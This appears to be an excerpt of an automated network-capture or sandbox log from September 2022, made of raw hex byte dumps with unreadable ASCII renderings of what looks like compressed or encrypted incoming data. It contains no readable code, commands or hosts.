                                                                                                                                                2022-09-29 12:51:58 UTC35182INData Raw: f5 8f c1 0c cb e5 f6 87 d0 ab d8 6a ac 8c fa 0a 59 4b 75 7a 65 c3 15 a2 17 d0 79 44 e0 b9 58 2d 67 cc 7e d0 59 46 57 4e de 13 3b eb a3 2a be aa fc ff 42 ac 80 3c d1 91 30 3d 88 85 a2 28 e0 5a a5 b7 de ee 75 be 35 0a 9b c7 3d 44 9f 87 d6 21 4f 21 85 82 8c 5d 55 4a f4 50 da 79 33 4d 7c 1a 57 12 f1 c6 3a e5 21 ba 46 c6 e1 e5 bd d2 b8 c0 0e b8 2f 48 30 0a 0c fb ce 1a 01 66 13 ed 43 29 89 60 0d f3 0a 42 b5 ed bc fb 67 bf 6e ba 55 f9 74 29 03 de 52 97 a4 14 4e a1 78 4c fb 5b 72 cd 18 4f 1c e4 ba 3c 43 23 b3 a5 58 ad 2a a6 4e e0 1f d9 30 56 29 5c 5e 43 76 88 38 9d 47 08 7f 04 44 ea 8e 31 6c 77 b5 3d 66 ff 47 39 c0 32 59 86 f2 c8 06 c9 18 25 64 80 b7 a5 a6 08 5a f9 65 bb 75 af cd eb 6e 75 65 62 99 24 1e 84 57 8d 0c fc cc 5d d7 94 61 ac b7 b3 9b 08 c9 81 2c 7f 2c
                                                                                                                                                Data Ascii: jYKuzeyDX-g~YFWN;*B<0=(Zu5=D!O!]UJPy3M|W:!F/H0fC)`BgnUt)RNxL[rO<C#X*N0V)\^Cv8GD1lw=fG92Y%dZeunueb$W]a,,
                                                                                                                                                2022-09-29 12:51:58 UTC35198INData Raw: 58 9b d4 98 c1 4c 0c 3f be c9 64 64 e2 5d 03 dd 07 c4 90 c8 f9 9a ce 1f a6 91 08 40 c1 5d c8 6a 6f e5 96 6a f4 b2 87 13 28 c0 4d 39 f7 db 18 5e f6 75 2c 61 5f 1b a0 dc 9c 1e 07 f6 f2 79 1d f3 a5 de 25 ce c9 c3 4e b2 e6 21 f5 8f 9a b1 6b ef 04 8d 52 f8 5e 28 49 97 f3 d7 47 34 64 8e 94 8a 5b 92 36 3e cf 4d 50 5d 03 42 3a ff 0e 20 09 98 d1 0c fb 36 60 04 32 14 f2 00 19 fc db 55 97 9a ef 46 f2 20 ab a0 9d 71 20 1f 67 bc 54 8a 92 e0 64 9b ac 5a 23 9a 5b 5d 45 0c 6b 88 b7 3a 3a 84 d0 84 50 c3 ca 98 ce 06 e7 0b b8 d2 25 7c 95 72 95 8d 21 0c 19 dd 5f 59 a3 bf 95 51 b6 4c 68 6e 15 36 48 be 56 22 b4 d0 50 82 83 10 c6 ed 24 7b ff 34 a2 35 3e 99 46 a1 6e 01 61 57 a1 ad 65 89 07 8b fe e4 af 5a 7c 31 e8 91 0f 73 96 d4 6e a9 24 36 9b 7f 27 71 a1 36 0d 4b b2 f8 58 3d 95
                                                                                                                                                Data Ascii: XL?dd]@]joj(M9^u,a_y%N!kR^(IG4d[6>MP]B: 6`2UF q gTdZ#[]Ek::P%|r!_YQLhn6HV"P${45>FnaWeZ|1sn$6'q6KX=
                                                                                                                                                2022-09-29 12:51:58 UTC35214INData Raw: c8 23 87 18 72 d2 6a c0 41 7a 8d 41 f7 31 0d 58 4b fb 67 b2 5b c9 f3 bb 97 14 0f 05 7f bc a5 79 88 6a 6b 07 8f 07 74 a0 31 b0 24 08 f7 db 54 73 7e 1e 3f 0e 00 dd 48 c4 22 9b cd 8e 95 64 68 b3 c0 37 10 41 2b 0f 4b f6 98 0c aa 78 18 e9 31 76 24 4c cc a0 3c 35 de 8a aa 6d c2 24 2a e9 7e 44 17 cd 59 6c 27 ad e3 65 f5 45 95 34 60 9c 1f f5 05 78 5b a7 de 0e 03 df 24 28 8c 06 13 6a 91 ef 40 8f 81 a4 e0 75 d3 79 bc a1 ff e5 b9 17 57 61 0c d1 fe ac 19 90 02 f5 31 3d 6d c7 b2 c0 a3 32 05 42 3e ef aa 54 02 c5 92 c7 e1 a7 11 49 86 05 a0 a1 db fb 7f 15 d5 59 7d ab 7f 8c 07 61 80 7f 54 89 d9 42 f5 d2 00 28 a2 1f d0 66 32 ee 10 e0 1f 80 f3 90 b6 18 1d 2b 75 e3 17 51 cd 42 60 f6 df 1a f8 80 e4 d3 f4 34 e9 4f dc 43 02 49 fe f7 23 e3 74 ee 2f f8 22 3b 00 00 02 58 23 aa 9c
                                                                                                                                                Data Ascii: #rjAzA1XKg[yjkt1$Ts~?H"dh7A+Kx1v$L<5m$*~DYl'eE4`x[$(j@uyWa1=m2B>TIY}aTB(f2+uQB`4OCI#t/";X#
                                                                                                                                                2022-09-29 12:51:58 UTC35230INData Raw: f1 0d 02 c8 9e 5b d2 69 50 ac 0e 05 6c 6e 3a 6c 5d 36 1a a6 24 06 5f b8 a2 a2 8c 0a 79 44 28 68 05 43 d9 72 f9 e4 88 fd 98 3e 01 de c4 04 3d f1 f5 78 78 73 8e a3 f9 de b2 5d 1a 79 be e6 b8 8c 72 50 cf d5 e0 e9 8c af e3 93 86 98 1e d4 06 6d 2a 3c b5 15 1a b2 8b 71 ed a7 96 19 5a 77 95 c0 6e 52 3a 95 03 33 f4 fa 66 b8 df a9 b0 00 e4 9e 82 a8 33 ba a5 71 83 88 23 eb 19 7b 29 51 da 7e 17 f4 ad 8b 06 e1 a6 d2 10 64 4e 96 ec e7 29 56 7c 5b 31 57 a6 aa a2 0f e7 cb 06 8b fd 8f 7e b8 55 03 92 35 bb a5 16 84 4d 11 e8 ba 2f c4 97 39 8d d0 f1 e7 ba b0 bb da fb f1 ec 6b 2e 61 29 62 e6 19 db 7d f8 79 f3 a7 4b db 87 ab 31 54 36 11 2d ff ba 33 1d ad 70 37 c0 d6 1b 22 73 79 67 8d 0f 53 a1 98 75 4d 56 52 93 d9 5d f2 66 40 ab af 34 13 e6 1e 2a 51 5b 7a 6a 80 3a 42 c1 ff 2b
                                                                                                                                                Data Ascii: [iPln:l]6$_yD(hCr>=xxs]yrPm*<qZwnR:3f3q#{)Q~dN)V|[1W~U5M/9k.a)b}yK1T6-3p7"sygSuMVR]f@4*Q[zj:B+
                                                                                                                                                2022-09-29 12:51:58 UTC35246INData Raw: 2f 5b 7e d5 15 7d 27 84 03 99 48 4f 40 14 4e 36 88 4f 28 09 c3 d5 12 8a 5e 04 3c 69 90 64 48 1f 49 11 75 f2 9e cd e2 8c 35 6e a6 b4 3b 0b 8b 3e ae ee fb 8f 19 b2 dd 40 b8 8b 86 c4 e0 5e d4 c2 5a c1 85 50 2c 63 2d 7e cd 55 e9 b5 80 d6 9b 9b 5c 7f 97 5a c8 98 73 90 89 8d 21 84 12 62 ed a5 c8 23 07 bb 5d 29 f3 70 39 b0 02 bc 48 18 09 d1 4c d7 dc 02 84 4a 61 01 66 ee 7e 96 c3 ee e7 91 a1 14 f8 65 51 c0 0c 06 76 93 f4 5a ae ef 25 0c f2 3c 83 13 94 e5 c0 f4 1e fe 1d 5c 71 e8 5d 77 1e 61 1d f4 46 f6 f1 5c 3b 57 4d 6e fa 04 5c e1 53 7f 6a 58 64 8e 3f 11 0b 96 3f ad b5 e1 af 5e 58 e5 2f 96 67 78 68 9d 2b 3d 80 4c 1e b8 96 dc 0e 59 ef 63 f4 b1 eb 5d 42 70 39 2d f8 a5 62 7d d5 da 90 59 cd 26 de 3d 37 7b 8e f9 5d a0 68 49 74 3e 59 eb 07 64 de f4 8b 07 2f b9 93 fb 9c
                                                                                                                                                Data Ascii: /[~}'HO@N6O(^<idHIu5n;>@^ZP,c-~U\Zs!b#])p9HLJaf~eQvZ%<\q]waF\;WMn\SjXd??^X/gxh+=LYc]Bp9-b}Y&=7{]hIt>Yd/
                                                                                                                                                2022-09-29 12:51:58 UTC35262INData Raw: b1 22 d3 c3 13 ca 0b ca 49 9a bd c8 48 97 01 4f d6 e9 0a 3d c3 92 d2 92 99 c7 94 b7 de f2 6a c7 b2 97 d4 9e 23 a1 5e 97 f3 cd bf 38 05 9a 48 89 81 1f b7 bb 01 42 81 01 74 e9 5e 0e 85 66 e9 7c 1e f4 51 13 6b 65 a9 a2 76 ba 31 4e a3 2a 83 7c 7e 52 1e a9 a5 d4 3e 9a 4e 80 ac 75 81 0f 92 d8 d6 90 a9 e2 b1 53 ca b9 28 28 a1 73 f4 78 33 10 a4 f1 99 d1 8b 91 df 3b 7c 3c f1 95 7d ab 93 54 98 7a 19 79 2a 83 80 14 fd 7d 3a 48 7a 53 a1 db 48 b8 c3 b2 18 06 fd 68 8c eb 3b 94 83 5e 81 9a 5a 1e 51 f4 71 f5 e3 53 38 42 00 a0 7e 9c b5 76 84 15 86 26 83 3c 75 4a 0b cb 79 b7 e1 9f 02 77 28 08 28 64 22 6e 62 a8 16 f6 71 06 a6 45 32 09 06 5b 56 ea f5 a5 b9 27 2f 65 49 c1 9d a7 f9 0b 02 b0 ec 4e a9 ee 22 e8 ce e2 43 3b 64 22 01 87 d6 84 35 76 8e 0e 2b d0 46 6c 83 1c e1 ca e0
                                                                                                                                                Data Ascii: "IHO=j#^8HBt^f|Qkev1N*|~R>NuS((sx3;|<}Tzy*}:HzSHh;^ZQqS8B~v&<uJyw((d"nbqE2[V'/eIN"C;d"5v+Fl
                                                                                                                                                2022-09-29 12:51:58 UTC35278INData Raw: 02 08 89 97 24 c8 4b ff f2 fe 40 d7 3f 02 e6 5f c9 99 5d 5e 9b 0c 2b 99 d9 be 62 37 b7 06 37 e7 20 42 27 dc 13 5f 82 6b ba c0 3d cc 91 c5 79 84 47 05 9f 51 04 a9 50 05 75 ef 4b b6 a9 82 24 63 96 09 74 73 26 67 5d cd 2f 82 f2 8b ae 5a 97 32 96 90 e1 df 48 e2 3e 48 5a 80 a9 ea 36 ab 0d d0 4d 51 28 f9 b1 59 c7 b5 df 0e 73 51 21 10 02 5c e3 98 b8 1c 7c 48 ae 13 e3 ef 53 ee b1 c0 25 1e b7 f2 2b d4 25 4e 65 d5 ab bf 1e 0a e5 a5 4a 23 be 1a e8 04 62 fb 59 73 b9 6a 82 59 7e 80 ec da 40 63 cb de d5 b9 d1 4e d4 fe 7d 59 bd 3d a1 99 8b 41 c4 dc bb 89 68 ea 83 37 01 e9 f0 c4 af f7 d2 a2 de 14 d8 c5 69 22 20 ed eb 02 d0 62 0a fe fb 70 96 0b 86 7f 75 d4 b8 3c 3f 29 bc d8 23 36 91 b6 a2 a1 58 75 41 4c d0 19 3e ce 10 6c 67 20 08 80 fa 2a 45 3d 2d cd b1 58 4a d6 d7 d2 39
                                                                                                                                                Data Ascii: $K@?_]^+b77 B'_k=yGQPuK$cts&g]/Z2H>HZ6MQ(YsQ!\|HS%+%NeJ#bYsjY~@cN}Y=Ah7i" bpu<?)#6XuAL>lg *E=-XJ9
                                                                                                                                                2022-09-29 12:51:58 UTC35294INData Raw: 3f a1 66 41 ca 9a f0 a7 a2 ba 21 98 0d 6b fe 16 58 34 c6 37 f0 95 02 72 66 7b 25 c7 ac 7b 13 1c 1f 96 47 eb 85 52 f1 f1 4f 68 0c fa cb b4 35 bc 14 91 96 9a 4f 8f 86 0c 34 7b f5 e6 2e 9e f9 73 26 90 09 95 4a bc e6 fd 20 d8 fc fd 61 97 c9 03 6d 4d 5e 39 96 0f 63 ea ba 46 63 01 0b 1b 36 05 0d e8 36 aa 81 41 5a 5f 67 de 01 b0 3e e1 35 bc 8e 47 2c 83 3e 39 68 45 1a 5f 82 61 70 68 d2 36 91 df bf a7 ca ee f5 a9 b7 b9 e9 cc 56 5d 6c 0f e4 e1 d5 15 97 bf c6 d1 29 90 97 c9 77 15 2b 84 aa 52 89 69 89 63 23 76 cd 8d ab c2 b4 7b a7 36 7d 6e 18 d9 62 e7 2e 65 e1 84 4c 7b c7 ed c6 c6 7f fe a8 de f4 e0 49 45 a4 62 23 97 b4 9b d8 ef 38 b5 2e 59 f2 13 93 94 cb 01 12 53 3d 59 c1 32 ec 5c d0 db 4f c8 4f 76 58 c9 60 be 5e 78 cb 1a c6 47 a7 18 9c 67 2a 24 40 73 17 7c 9b 26 f4
                                                                                                                                                Data Ascii: ?fA!kX47rf{%{GROh5O4{.s&J amM^9cFc66AZ_g>5G,>9hE_aph6V]l)w+Ric#v{6}nb.eL{IEb#8.YS=Y2\OOvX`^xGg*$@s|&
                                                                                                                                                2022-09-29 12:51:58 UTC35310INData Raw: c1 ca 21 78 79 03 29 91 fa 6d 5f 67 0d 2d 5d 48 cf 0f 11 21 02 d6 dc 58 3e 75 d3 06 de 30 02 cc bb 09 f3 ed 88 9e 50 44 0e c1 53 c4 a7 cb 25 96 eb 23 0a bc 3b 5f b5 81 3b f4 40 38 7c 27 0c b9 e7 c5 5e 9f 7f 0f a2 19 97 f9 79 46 25 21 0d 5e 42 84 f2 5e 93 b8 25 ee a9 36 f9 57 26 9a 59 c8 04 c4 ef 77 21 c2 73 ce 41 d8 33 29 1b ef e0 00 08 12 39 56 05 e7 9e ae 2d 60 ec 94 4f 1b 90 14 1c 6f c1 cb 45 71 3b 84 ac 82 48 3e f0 39 69 bd 31 b8 aa 42 6c 73 d3 d2 4f 3f fb 07 d8 c6 9b fd 4c be 1a 87 ef 77 e2 d4 af 07 b1 fe b9 04 e7 e8 a5 48 18 be a0 0c 3a 52 e9 16 87 0a cf e4 47 0c 23 cc aa 6b 6c 73 66 91 c9 3e 96 48 c6 a3 06 4e 4c 8f e1 77 f7 e1 83 56 af 0e c2 60 4c 23 7f 79 99 d3 a0 f2 17 a0 ff f0 e1 b4 55 93 71 45 21 d3 0d a5 7a 12 4a a4 0c 7d 85 4d 63 89 68 0a f0
                                                                                                                                                Data Ascii: !xy)m_g-]H!X>u0PDS%#;_;@8|'^yF%!^B^%6W&Yw!sA3)9V-`OoEq;H>9i1BlsO?LwH:RG#klsf>HNLwV`L#yUqE!zJ}Mch
                                                                                                                                                2022-09-29 12:51:58 UTC35326INData Raw: 81 54 81 b3 6b fa 47 7c 60 57 5c 0e fb 17 e9 fd 67 e9 01 7b d6 61 37 3b 30 2f fa c4 bb 8d d1 af cc 52 61 36 7b 19 e7 32 aa f0 c2 77 17 31 e1 b1 3d 64 5d 69 ad e6 25 26 aa 5d 21 b1 aa 55 bc 1b 0a ad 2e 92 42 43 b9 69 57 ca 59 5c ba 32 38 b2 1c db 51 2d 13 24 05 d6 9e e1 e6 46 83 26 cb f6 65 4b 33 8f e6 09 38 e0 c4 69 d4 89 1d e7 cf f6 00 19 0c 5b ae 5e 44 0b 32 29 94 d4 0c 4a a8 4b 64 53 10 86 78 84 5a c4 71 15 a8 2d b3 82 c8 e9 5b d3 25 b7 23 d8 95 54 6e a4 15 77 bc 99 85 c0 bb 0a e6 76 99 23 81 f3 5c 40 ae 4d bf bf 6c 2b c9 76 f0 0d b1 3d c8 66 8c 83 3d db 4f de e3 c7 4c 99 93 5d 56 2c 40 e8 d8 1a 12 43 c6 63 30 7b b0 0f 93 f5 d1 ab 40 39 cd 3a d9 41 4f 25 45 1e 1c e8 4e 4f ef 99 ae 34 c4 4e fb 75 94 52 2f 89 0e d0 10 a7 ae 22 5f 11 3f 53 43 fc 22 80 73
                                                                                                                                                Data Ascii: TkG|`W\g{a7;0/Ra6{2w1=d]i%&]!U.BCiWY\28Q-$F&eK38i[^D2)JKdSxZq-[%#Tnwv#\@Ml+v=f=OL]V,@Cc0{@9:AO%ENO4NuR/"_?SC"s
                                                                                                                                                2022-09-29 12:51:58 UTC35342INData Raw: e9 5d 4b 3e 37 15 57 9e 81 a4 0e 9d 3b 3d 6f 8b 00 5c 82 06 d2 8b 87 35 15 7e 83 bd 32 4d 71 c4 d8 24 46 56 b2 9c dc 9f 5d dc 87 3d 37 b7 ed 04 a4 2a d0 5a b7 67 48 f1 95 85 1f 71 2e 49 59 2d 90 d1 1b 71 89 c7 13 4c 90 d8 96 f0 6f 3f 1a 53 ad a9 5e 86 7b 7c 09 0c b9 57 24 7a 9b ed 6b 72 ec 72 66 48 80 73 a4 13 6a 24 0c 1c 8f 5b cf b4 c3 b8 70 40 93 64 85 8e 61 9b 46 a2 72 c4 b9 8d 47 e7 67 ad b4 9a ef 87 94 13 5b 11 1f 01 7e f1 d9 c0 6c fd 7a 63 d5 d1 c0 69 d6 b4 6c 84 2d bf e2 cf 7c 32 eb d4 28 53 c4 4d 22 a9 2f 92 03 ab 09 6e d7 a4 bc ac 85 ee b8 5b 59 8c 13 95 e7 15 49 88 86 4c 88 15 3a 64 1b 95 8d b4 48 f8 63 ec a6 dd 9b 99 bf 36 44 cd e8 14 a7 5a e2 3e f8 7a ef ea e8 18 01 1c f4 8d cc 10 13 45 3d 7a 14 60 fa e0 15 61 cc ae 18 0a c0 31 8a df c5 1e 5f
                                                                                                                                                Data Ascii: ]K>7W;=o\5~2Mq$FV]=7*ZgHq.IY-qLo?S^{|W$zkrrfHsj$[p@daFrGg[~lzcil-|2(SM"/n[YIL:dHc6DZ>zE=z`a1_
                                                                                                                                                2022-09-29 12:51:58 UTC35358INData Raw: 87 d6 c2 73 a7 fb 30 05 9e d0 4c 3a 7c f4 b7 9f ac ca 41 20 7d 6d b3 f0 2f 22 bd 57 34 ee 59 91 31 40 98 31 39 0d 67 b9 66 72 e5 8f 73 bb b1 7a 83 14 65 16 2b 80 69 b1 95 55 01 a6 11 40 ec 61 bd 51 1f 6c fe 02 c7 ac 83 80 d5 77 c2 64 87 18 03 60 86 5a 39 cf b9 b5 a8 ba 87 8f d9 09 ba 9d d2 21 11 8d e6 3f 0f a4 3f c3 d0 fa e0 ed 6b 74 0d 5e af 34 eb 5a e6 e2 5c c4 1d 40 42 01 87 8f 2d 66 5c 39 10 41 87 b5 9d 1b 61 af 0f a4 da 52 d9 35 c7 12 8d a3 64 06 f8 64 e5 b1 f0 03 22 fe 96 eb 6b f2 fd 55 b1 2e f4 1d 08 46 1f f7 ff da be 28 a3 84 ad 98 e7 50 f2 2e 16 01 81 5b 55 36 0c 0a 59 22 f9 cd 9e 9d 03 3c bc 50 74 6a 40 19 c5 a6 d1 ec ba 16 67 e1 c6 34 ad d4 fd 71 71 38 a7 8d ff 59 c2 1e 98 c6 17 24 47 e1 b5 f2 9c b1 5c fb 75 24 cb 20 3d 5b 51 ba ed 17 41 d0 fe
                                                                                                                                                Data Ascii: s0L:|A }m/"W4Y1@19gfrsze+iU@aQlwd`Z9!??kt^4Z\@B-f\9AaR5dd"kU.F(P.[U6Y"<Ptj@g4qq8Y$G\u$ =[QA
                                                                                                                                                2022-09-29 12:51:58 UTC35374INData Raw: a9 af 00 cc 54 a4 4f cf ae 7c 3c 9d 82 fa b6 cf 46 15 49 8b e5 f4 92 38 e5 7a 86 65 75 fe e9 2c bc 72 fc a7 6a 62 63 1a f4 a8 7c d0 5e 82 55 5c 77 f3 37 ac 92 96 08 5d 4d 29 16 95 c1 e8 ec c9 e7 28 55 0f 3a 3c 24 fa c2 a7 6d ae a6 f6 15 fc 4f 02 ef cf c3 96 2f 8f c3 54 82 60 04 bc 01 23 b6 13 62 aa 1e 3f b2 d7 86 f7 27 0f 9c ed cd f5 17 5c 61 24 ac 13 d3 aa 81 d7 88 4b 26 58 9e ba cf 15 97 6b af 02 6f b0 ba 5c e4 69 a4 c6 0f 59 b0 0d 3c 1e db bf 09 05 09 41 f6 04 96 b5 54 5c 02 62 40 55 bc 2c 93 39 99 b0 a4 f4 c1 44 7c 3e ee 59 b4 c1 65 ab d2 18 94 14 71 a8 e9 82 73 cd 5f c3 2a 5f 01 5a 70 92 86 7c 74 96 d3 b5 a0 d6 e3 4d 91 63 55 2e 7c 19 5f d8 3b f9 8e fd 42 d0 56 8d 56 59 70 69 ea 35 1f 7b 4b 6e 4f 18 1b c5 20 3e b2 b9 df 66 d6 33 01 33 e0 01 4b dc 45
                                                                                                                                                Data Ascii: TO|<FI8zeu,rjbc|^U\w7]M)(U:<$mO/T`#b?'\a$K&Xko\iY<AT\b@U,9D|>Yeqs_*_Zp|tMcU.|_;BVVYpi5{KnO >f33KE
                                                                                                                                                2022-09-29 12:51:58 UTC35390INData Raw: 22 94 c2 25 f9 bc e3 ee 9d df fe cd cc 1a 78 cf fd 0f 5d ce 03 0a 89 5d 85 f6 6e 32 03 7d 36 af 03 e7 4c 4d c4 3f ad e1 fe 2e 97 9a 38 85 90 25 33 88 6a ce 21 9f 43 9c 06 4e ce 81 fc 32 87 dd 06 3a f5 29 be 83 7b 4a e2 b7 ce a5 cd c7 85 0a 41 c3 96 85 c2 32 61 2a 38 1a d5 17 58 74 84 68 96 fd 17 0a 8f 6a 0e d9 06 63 ca 10 66 d9 fa ba dc 3e a5 d7 46 06 03 04 6a 99 c3 ca 08 cb ba 93 d6 82 3f 0a c8 5d 26 be 0d c5 e4 07 a5 6c f1 52 1a 8c 50 d2 58 20 1e d5 31 ba d9 a1 f8 dc 2c 60 fb 33 52 22 31 fb a3 f4 2a 52 d8 93 9f 44 1b 10 ea 71 a3 c6 66 19 4e ac 0d 9f 8b ce d9 f4 cd 22 c3 dd 98 85 86 41 0c 2c fc f6 2e c4 62 bc 57 59 b8 6f c2 f3 f2 dc d5 e5 10 07 ea 74 b1 eb e8 14 ef 47 63 94 9b 8c 46 a9 99 0c 38 25 dd a9 df c7 39 93 c5 da 42 aa 95 6d a0 bd 84 21 d5 9a ce
                                                                                                                                                Data Ascii: "%x]]n2}6LM?.8%3j!CN2:){JA2a*8Xthjcf>Fj?]&lRPX 1,`3R"1*RDqfN"A,.bWYotGcF8%9Bm!
                                                                                                                                                2022-09-29 12:51:58 UTC35406INData Raw: 4d ce a4 3b 6b 56 e7 b3 de a9 6c 6d 6f 59 86 2d 8e 5a ca e9 ee 19 d1 bc 07 32 3b a3 a0 d5 4c af c3 3e 49 61 da dc 48 ed 6a 49 76 77 d7 3f 45 87 0e d3 be 10 8f ae ad 4f 71 44 3e a0 46 d0 29 db f3 83 b0 27 57 dc 0e 95 fc e4 37 dd 47 33 28 9e 50 53 aa 19 56 38 a2 69 8b 0e 39 e9 91 3d 0c 15 55 2a 59 cc 42 cf 2d b6 44 89 2c ff b9 61 79 f0 db 84 a4 81 dc 52 dd bf ab f7 98 da de 37 9f 0f 02 40 1b 59 16 f6 e0 57 8f cc 68 ac 82 14 07 de 45 f9 b4 b1 06 e9 0a 07 98 9d 12 7c 68 1a 6c 65 1b 59 23 54 bd 74 93 f1 59 f9 cd a1 35 aa 17 50 83 e8 74 af 21 70 42 03 a9 39 ac 27 69 fb cc d7 95 59 22 f4 9e a4 e0 aa 0b a4 e3 34 16 ba 46 c8 6d 22 0c 49 3a 7f c2 3e 33 c9 3f 38 0b 75 7a c1 ee b8 af 36 bd 73 4b c6 96 30 7e 4d 41 fb fa 11 28 80 35 10 20 f3 5c c7 9d cb 75 7c 89 c1 85
                                                                                                                                                Data Ascii: M;kVlmoY-Z2;L>IaHjIvw?EOqD>F)'W7G3(PSV8i9=U*YB-D,ayR7@YWhE|hleY#TtY5Pt!pB9'iY"4Fm"I:>3?8uz6sK0~MA(5 \u|
                                                                                                                                                2022-09-29 12:51:58 UTC35417INData Raw: bf 17 87 d3 1b 62 a9 6b 4f aa d1 e6 42 e4 64 20 20 9e 34 93 a3 a9 47 cb f5 76 b7 31 72 55 31 1a 3f be 37 c4 39 ff 50 e0 ec fe 11 f0 e1 9b f2 dd 93 ef 29 fa 92 41 c7 fb 5e a8 0a 01 f1 88 04 7a d0 5b e6 7c 9d 97 62 64 b8 ca 55 5e a8 af d0 7a 0d ea dc 05 f1 9a 42 82 b6 9b 65 60 2f 27 6a 40 87 7a 73 55 e0 7c a5 4a 49 23 a8 6e 6f ce 17 67 62 75 f8 44 c7 af c5 c0 a0 5c 24 2c 08 f8 c5 35 7b 1a 4f 65 67 5b cb c0 f2 83 99 6b 6e 5b a5 f1 a7 33 26 09 c4 16 72 1c 12 a2 4a 0c a9 86 f5 e9 87 34 32 71 d2 20 fa bd ba 21 cf b3 50 51 ac cd b3 6b 1b 31 f0 6e c0 3a 0a 93 1b 61 92 ef 00 17 fb 93 13 e6 97 70 3f e3 19 0f b7 b1 0f 08 a5 d3 14 97 0e a4 b0 15 fd fe d2 11 4d 31 2a 19 18 09 95 ad 7c c0 79 9e 77 c1 92 a9 1f 5b 36 76 df 42 cc 15 f6 f7 d8 53 f0 af c9 f9 4a b5 dc 11 e4
                                                                                                                                                Data Ascii: bkOBd 4Gv1rU1?79P)A^z[|bdU^zBe`/'j@zsU|JI#nogbuD\$,5{Oeg[kn[3&rJ42q !PQk1n:ap?M1*|yw[6vBSJ
                                                                                                                                                2022-09-29 12:51:58 UTC35433INData Raw: 33 f4 23 a8 41 de 80 ca 71 39 7e fc aa 1d b6 5f 5f ae 95 83 bc aa c2 9b 6c 92 e1 69 f0 cb 92 f3 a4 65 43 33 7b 6f 20 ac d7 f2 ef 9e aa 6f 80 44 98 05 31 a9 ce ce 2c 43 ac 95 d2 52 09 7f 84 e4 75 b9 ae a8 91 d0 5d cb 3d a2 87 9e c2 a3 b6 92 ca ae ed f7 fa 3f 60 07 39 c1 c7 ef 7f 21 da 84 64 d5 6b 80 26 97 3a 6c 76 5b ef 70 c0 43 04 ac b9 5e 62 1d da 4c f4 a1 f1 24 eb 1f f2 b6 9c 61 27 3b 5e 8a bf 02 12 39 2e e7 39 97 aa ad ea 56 90 3a 97 70 51 e9 08 42 c8 d2 e8 b5 ec 11 14 47 e4 cf 10 14 0e f9 1e 0e b6 ee b5 9b 49 a1 c6 2f 86 fc fb 81 19 f3 97 fc e2 c6 38 25 2a 63 34 e1 3d 96 52 32 d2 ae 66 16 08 03 ab 4c 95 f3 39 90 7d 49 23 de 8f 7f 3d be 7f ad ee 11 f7 bb e8 16 6b e7 1e 7f c5 51 5a c2 95 92 9e f4 3a b9 41 90 8d 04 76 1a db 50 11 35 7b d5 35 72 da 2d a3
                                                                                                                                                Data Ascii: 3#Aq9~__lieC3{o oD1,CRu]=?`9!dk&:lv[pC^bL$a';^9.9V:pQBGI/8%*c4=R2fL9}I#=kQZ:AvP5{5r-
                                                                                                                                                2022-09-29 12:51:58 UTC35449INData Raw: 29 27 2d c9 1a 54 5c 65 bb 94 61 8d 94 73 17 93 f2 86 42 a1 ee 97 f7 fa c3 36 99 ad 05 dc fd ca 4f db 6f 9c f6 13 02 68 29 64 cd 02 68 d2 91 42 0d 4f df 35 fe 4a 84 26 40 d8 33 90 79 72 57 b5 9a 2c 2d 94 8b b8 34 8f ce 74 53 39 b9 81 37 5e c8 fc 9e 6e 43 5a ed 06 20 6d 49 06 21 49 73 58 d9 ce c1 98 ca 1e 6c 3c 7a 5c d6 52 a7 33 79 4a 95 ad 62 3c 57 fd 88 da bd 14 d3 56 d7 f0 e4 bb 99 a7 2a df b6 13 2f 7b 84 ec 95 a1 e3 0f 45 35 2c 0f 32 d4 49 ca b3 e7 40 8e d2 96 31 ff 08 6e 02 14 b4 70 7e 8c b7 ba 34 df ba 2c a4 1b 4e c4 da 5c b7 ce cd aa 65 48 d2 24 06 38 b6 f2 03 8f 6f ab 94 78 56 97 40 0f a4 b7 ce 47 33 4d 3d c2 46 63 6d 0c d9 78 1a 3e 18 73 96 3b 71 cf 4b b9 1e 05 07 fd ba 84 c3 ca e5 d9 50 6a 27 c2 08 9c 80 39 7f e7 2b 62 e9 7a 76 0e 13 12 7d bc eb
                                                                                                                                                Data Ascii: )'-T\easB6Ooh)dhBO5J&@3yrW,-4tS97^nCZ mI!IsXl<z\R3yJb<WV*/{E5,2I@1np~4,N\eH$8oxV@G3M=Fcmx>s;qKPj'9+bzv}
                                                                                                                                                2022-09-29 12:51:58 UTC35465INData Raw: 87 ff 14 36 28 3f ed f9 d7 53 94 fb aa ea 0d 44 ad bd ea af df e6 fb 51 e1 82 bc 1b fb 22 97 39 6f 9b 2e 53 20 2b 99 47 1a 7a 92 6e b4 d5 53 89 f0 25 3e 58 9b df 4f 27 52 c6 a9 cc fb 76 a3 56 81 ca b8 70 3f f6 32 20 b3 3f 07 4d 43 76 02 15 87 84 54 7e 5d 81 05 47 02 08 aa fb 7b c1 4e d9 54 c7 cd db e0 b7 78 bf 10 db df 8e a0 7b 0f ef e3 95 5b c1 e5 b0 bf 3e 05 9b e8 b2 9f d9 6c 48 21 01 5b fe 8e 6f b9 ee bd 16 e5 fa 4a a9 e7 b1 46 91 d9 ea 9e a5 90 c8 86 83 59 dd 3b f1 84 9a 84 53 77 87 ba 9a 45 98 8e b8 db 8c 9b b2 86 28 9d 8b 4b 71 0f 83 62 97 0b d8 8b 40 82 c8 1e e2 0b 17 d4 90 73 98 e4 3a 2e 82 4a 85 7e 87 cc 03 ac 13 14 1c c2 f8 ab 75 2f ec 51 56 27 3f 1a a1 09 1b 5f 46 83 a1 d5 e9 ca ec f7 b4 f9 47 78 a6 44 89 c8 a5 f1 d5 cc f7 15 0e 3d 55 b9 b2 6d
                                                                                                                                                Data Ascii: 6(?SDQ"9o.S +GznS%>XO'RvVp?2 ?MCvT~]G{NTx{[>lH![oJFY;SwE(Kqb@s:.J~u/QV'?_FGxD=Um
